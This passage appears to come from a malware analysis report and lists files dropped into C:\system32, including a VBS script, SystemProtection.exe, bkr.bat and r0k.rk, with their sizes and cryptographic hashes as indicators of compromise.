  SHA512: ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
- C:\system32\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
  Filesize: 181KB
  MD5: 91f6b90fc19be94b62bb3ec2ff60fc30
  SHA1: ed92e88998bf8ed11994291fbdcdebf7272249fa
  SHA256: 57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
  SHA512: ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
- C:\system32\SystemProtection.exe
  Filesize: 166KB
  MD5: a47cbe969ea935bdd3ab568bb126bc80
  SHA1: 15f2facfd05daf46d2c63912916bf2887cebd98a
  SHA256: 34008e2057df8842df210246995385a0441dc1e081d60ad15bd481e062e7f100
  SHA512: f5c81e6dc4d916944304fc85136e1ff6dee29a21e50a54fe6280a475343eccbfe094171d62475db5f38e07898c061126158c34d48b9d8f4f57f76d49e564e3fc
- C:\system32\bkr.bat
  Filesize: 568B
  MD5: fc6f03cfefec6ed5e12c8de71c815751
  SHA1: b35cb2e194b5167322acc4ab782f6bef76409de2
  SHA256: ef8bd89fdc7a3e711849f318d97ab0693432daf34f7b83f18e894fa4d22e956f
  SHA512: ba9fbfff61de7d68e8612b9364bc8cb04117727a38f6f77912b4c4895b064f83e8b33aee51e32fef945cd13c88b2e03c5a7e21910de71fe4cd8d1a0f93fd7ad3
- C:\system32\r0k.rk
  Filesize: 8B
  MD5: 0438048db30e1b7f6ab1dc26028b9019
  SHA1: da1a0594a0587908a2369708c3c6cdcc316cfbad
  SHA256: 59450696618a55d09cd8110b2a6191a4de8458da35f41a4112c3d408db9d6cc0
  SHA512: d3106527baaca4150f934d19d4da846ea37db0378077695d4f5e1f4a7488e600467a3d22b481ebfc36b94dc95a6f195a24f041702cde301b00f455418e7e776d